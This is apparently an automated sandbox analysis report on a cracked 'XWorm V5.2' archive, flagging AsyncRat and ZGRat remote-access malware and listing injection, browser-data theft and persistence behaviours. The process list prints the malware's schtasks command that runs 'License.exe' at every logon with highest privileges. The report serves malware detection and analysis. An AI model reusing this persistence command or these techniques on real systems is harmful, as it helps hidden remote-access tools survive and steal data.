Analysis Overview
Threat Level: Known bad
The file http://gff was found to be: Known bad.
Malicious Activity Summary
ZGRat
Detect ZGRat V1
AsyncRat
Async RAT payload
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Enumerates system info in registry
NTFS ADS
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-11 12:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-11 12:05
Reported
2024-04-11 12:35
Platform
win11-20240214-en
Max time kernel
1768s
Max time network
1801s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
ZGRat
Async RAT payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEW.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\License.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NEW.EXE | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe | N/A |
Obfuscated with Agile.Net obfuscator
Reads user/profile data of web browsers
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4748 set thread context of 4928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 4700 set thread context of 788 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 3456 set thread context of 3504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2567984660-2719943099-2683635618-1000\{77274673-D791-4D40-B9FA-196C352C1F4C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm.V5.2.rar:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04CF9089\XWormLoader 5.1 x64.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe:Zone.Identifier | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\License.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://gff
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffbf52e3cb8,0x7ffbf52e3cc8,0x7ffbf52e3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3504 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5704 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5280 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6704 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7096 /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XWorm.V5.2.rar"
C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C478F9\XWorm V5.2.exe"
C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C3632A\XWormLoader 5.1 x64.exe"
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
"C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"
C:\Users\Admin\AppData\Local\Temp\NEW.EXE
"C:\Users\Admin\AppData\Local\Temp\NEW.EXE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "License" /tr '"C:\Users\Admin\AppData\Roaming\License.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4C0E.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "License" /tr '"C:\Users\Admin\AppData\Roaming\License.exe"'
C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C6EA5A\crack.exe"
C:\Users\Admin\AppData\Roaming\License.exe
"C:\Users\Admin\AppData\Roaming\License.exe"
C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C1FF7A\ConsoleApp1.exe"
C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C0FC8A\ConsoleApp1.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04C4FADA\XWorm V5.2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7452 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6340 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
